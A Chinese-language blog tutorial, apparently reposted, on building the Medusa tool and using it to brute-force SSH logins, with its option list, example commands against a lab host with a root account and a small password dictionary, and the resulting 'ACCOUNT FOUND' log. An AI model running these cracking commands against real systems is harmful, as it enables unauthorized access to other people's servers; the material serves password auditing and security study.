使用Medusa美杜莎暴力破解SSH密码

1、Medusa简介

Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具。

官方网站:http://foofus.net/goons/jmk/medusa/medusa.html。

2、安装medusa ,手动编译和安装medusa

[root@k5 ~]# yum install libssh2-devel libssh2-devel  -y

[root@k5 ~]# tar zxvf 2.2.tar.gz

[root@k5 ~]# cd medusa-2.2/

[root@k5 medusa-2.2]# ./configure   --enable-debug=yes --enable-module-afp=yes --enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes --enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes --enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes --enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes --enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes --enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes --enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes --enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes --enable-module-web-form=yes

#这个参数中加入很多模块,这样方便后期使用。--enable-module-ssh=yes这个就是稍后要使用的暴力破解sshd服务的模块。

[root@k5 medusa-2.2]#make -j 4

[root@k5 medusa-2.2]# make install         #安装完成后,会将medusa的一些modules 文件复制到/usr/local/lib/medusa/modules文件夹。

[root@k5 ~]# ls /usr/local/lib/medusa/modules  #查看已经生成的模块

3、Medusa参数说明

Medusa [-hhost|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module[OPT]

-h [TEXT]      目标主机名称或者IP地址

-H [FILE]       包含目标主机名称或者IP地址文件

-u [TEXT]      测试的用户名

-U [FILE]       包含测试的用户名文件

-p [TEXT]      测试的密码

-P [FILE]       包含测试的密码文件

-C [FILE]       组合条目文件

-O [FILE]       日志信息文件

-e [n/s/ns]    n代表空密码,s代表为密码与用户名相同

-M [TEXT]      模块执行名称

-m [TEXT]      传递参数到模块

-d                 显示所有的模块名称

-n [NUM]       使用非默认Tcp端口

-s                 启用SSL

-r [NUM]       重试间隔时间,默认为3秒

-t [NUM]       设定线程数量

-T             同时测试的主机总数

-L                 并行化,每个用户使用一个线程

-f                 在任何主机上找到第一个账号/密码后,停止破解

-F                在任何主机上找到第一个有效的用户名/密码后停止审计。

-q                显示模块的使用信息

-v [NUM]      详细级别(0-6)

-w [NUM]     错误调试级别(0-10)

-V                显示版本

-Z [TEXT]      继续扫描上一次

4、破解单一服务器SSH密码

例1:通过文件来指定host和user,host.txt为目标主机名称或者IP地址,user.txt指定需要暴力破解的用户名,密码指定为123456。

[root@k5 medusa-2.2]# cd

[root@k5 ~]# echo 10.27.17.34 > /root/host.txt

[root@k5 ~]# echo root > /root/users.txt

[root@k5 ~]# medusa -M ssh -H ./host.txt -U ./users.txt -p 123456

注:可以看到暴解成功。

例2:对单一服务器进行密码字典暴力破解

[root@k5 ~]# vim /root/p.txt       #写入以下内容,每行一个密码,做一个临时字典 。

123

abc123

123456

666666

注:其中123456 是我们的密码

[root@k5 ~]# medusa -M ssh -H ./host.txt -U ./users.txt -P p.txt

例3:加-O  ssh.log 可以将成功破解的记录记录到ssh.log文件中

[root@k5 medusa-2.2]# medusa -M ssh -H /root/host.txt -U /root/users.txt -P /root/p.txt -O ./ssh.log

ACCOUNT CHECK: [ssh] Host: 10.27.17.34 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (2 of 861 complete)
ACCOUNT FOUND: [ssh] Host: 10.27.17.34 User: root Password: 123456 [SUCCESS]

[root@k5 ~]# cat ssh.log

# Medusa has finished (2019-09-19 11:13:37).
# Medusa v.2.2 (2019-09-19 11:15:16)
# medusa -M ssh -H /root/host.txt -U /root/users.txt -P /root/p.txt -O ./ssh.log 
# Medusa v.2.2 (2019-09-19 11:26:37)
# medusa -M ssh -H /root/host.txt -U /root/users.txt -P /root/p.txt -O ./ssh.log 
ACCOUNT FOUND: [ssh] Host: 10.27.17.34 User: root Password: 123456 [SUCCESS]
# Medusa has finished (2019-09-19 11:26:40).

转载于:https://www.cnblogs.com/kezi/p/11548162.html

使用Medusa美杜莎暴力破解SSH密码相关推荐

  1. 美杜莎暴力破解ssh【服务使用有危险,望君谨慎】

    [root@localhost ~]wget https://github.com/jmk-foofus/medusa/archive/2.2.tar.gz #下载包 [root@localhost ...

  2. 密码爆破工具:Medusa(美杜莎)-操作说明hydra-操作说明

    目录 密码爆破工具:Medusa(美杜莎)-操作说明 hydra-操作说明 密码爆破工具:Medusa(美杜莎)-操作说明 科普下: Medusa是支持AFP, CVS, FTP, HTTP, IMA ...

  3. hydra海德拉 and Medusa美杜莎简单使用教程

    hydra海德拉使用 hydra -L /home/chenglee/zidian/user.txt -P /home/chenglee/zidian/wordlist.TXT 192.168.137 ...

  4. 密码爆破工具:Medusa(美杜莎)-操作说明

    科普下: Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, Postg ...

  5. Freebsd 下用 sshguard 防止暴力破解 ssh 密码

    2019独角兽企业重金招聘Python工程师标准>>> 在 Freebsd 控制台或用 dmesg -a 查看系统消息的时候会发现类似于下面的大量信息,这是因为有人在尝试暴力破解 S ...

  6. 第八天 02.hydra暴力破解ssh密码以及ftp密码

    hydra暴力破解ssh密码 实验环境: ​ windows7 ,kali 实验步骤: windows进入hydra目录 cd 命令 使用命令爆破SSH hydra -l 用户名 -p 密码字典 ss ...

  7. Medusa(美杜莎)和Hydra(九头蛇)快速入门手册:01

    今天主要是初步介绍一些Hydra和Medusa的分析和内容,旨在方便快速入门,这是第一部分Medusa,后面附带一些字典,之所以是写一起,我是觉得这两个都是不错的工具,不应该分开的,在这种思想下就汇总 ...

  8. Medusa(美杜莎)和Hydra(九头蛇)快速入门手册:02

    本文是Medusa和Hydra快速入门手册的第二部分,第一部分的传送门这两篇也是后续爆破篇的一部分,至于字典,放在最后,后续会把祖传的几十G字典准备好 Hydra入门使用手册 vanHauser Th ...

  9. DenyHosts教程:防暴力破解SSH密码

    背景 此前服务器多次被恶意挖矿,我们通过下面的命令搜索SSH远程登录日志,发现攻击者的IP尝试登录了200多次,即暴力破解了被攻击用户的密码.通过询问该用户得知,设置的密码确实比较简单,为了防止后面被 ...

最新文章

  1. 卧槽!Python学习神器!!!
  2. java中Map的用法(HaspMap用法)
  3. centos下部署启动elasticsearch错误集合与解决方案
  4. Android ----中文Api 百度地图
  5. mysql模糊查询指定根据第几个字符来匹配
  6. php判断全是中文正则,php判断是否为中文正则表达式大全
  7. 区块链学习笔记:D03 区块链在各行业领域的应用(一)
  8. C语言编程数出1到100的整数中出现了多少次数字9
  9. H264--H264解码--5
  10. 使用BUSHOUND抓包USB数据视频分析
  11. 为什么RGBW排列比RGB排列分辨率更高
  12. 大数据与人工智能结课论文
  13. 在线计算机免费课程表,Simple课程表
  14. pytest之parameterize参数化
  15. 腾讯海外计费系统架构演进
  16. 如何把几张照片拼在一起?
  17. cop2000实现补码两位乘
  18. 大学“电路分析基础”试题合集第六章(文末附PDF文档与Word文档)
  19. 基恩士读码器HR-101B USB-COM连接读取数据
  20. 【转】VMWare+WinDbg搭建(驱动)调试环境

热门文章

  1. mysql学习笔记(1)_DQL(Data Query Language)
  2. websphere 实用_将WebSphere Cast Iron Studio PGP活动与外部PGP实用程序一起使用
  3. 一加手机android auto,一加手机怎么升级安卓5.0系统
  4. MLAT-Autoencoders for Conditional Risk Factors and Asset Pricing---上篇
  5. 覆盖vue.js样式_使用Vue.js和Cloudinary在化身上覆盖眼镜/面罩
  6. txt电子书如何用Windows电脑阅读?
  7. 04-积极的环境改变人(哈佛幸福课-全部英文)
  8. 为什么要格式化namenode以及注意点
  9. 计算两个时间的时间差(C语言)
  10. 关于“其他容量”的清理方法